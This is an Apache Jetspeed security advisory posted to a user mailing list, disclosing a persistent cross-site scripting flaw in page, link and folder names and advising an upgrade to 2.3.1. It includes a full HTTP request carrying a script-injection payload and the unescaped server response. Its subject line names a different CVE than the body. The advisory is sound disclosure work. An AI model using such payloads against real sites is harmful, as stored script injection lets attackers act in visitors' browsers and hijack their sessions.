[CVE-2016-0711] Apache Jetspeed information disclosure vulnerability

[David S Taylor <da...@bluesunrise.com>]

CVE-2016-0710: Persistent Cross Site Scripting in links, pages and folders

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Jetspeed 2.2.0 to 2.2.2
Jetspeed 2.3.0
The unsupported Jetspeed 2.1.x versions may be also affected

Description:
The functionality to add a link, page, or folder, is vulnerable to persistent Cross Site Scripting. This is because it is possible to include HTML tags in the object's name, such as is the example below where a page object is being renamed after creation.

Mitigation:
2.2.0 - 2.3.0 users should upgrade to 2.3.1

Example:
Given this AJAX request:
POST /jetspeed/services/pagemanagement/info/.psml/_user/andreas/foobar.psml?
_type=json HTTP/1.1
Host: 192.168.2.4:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101
Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.2.4:8080/jetspeed/ui/_user/andreas/foobar.psml
Content-Length: 60
Cookie: JSESSIONID=F95E2034A086BE172EF816FF2C853BE9;
JS2TOOLBOX=TAB=theme&CAT=Administration
Connection: close
title=foobar</a></li><script>alert(document.domain)</script>

Which results in the following content in the server response:
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<title>foobar</a></li><script>alert(document.domain)</script></title>

Note that this code will be executed every time someone visits that space.

Credit:
This issue was discovered by Andreas Lindh

References:
http://tomcat.apache.org/security.html




---------------------------------------------------------------------
To unsubscribe, e-mail: jetspeed-user-unsubscribe@portals.apache.org
For additional commands, e-mail: jetspeed-user-help@portals.apache.org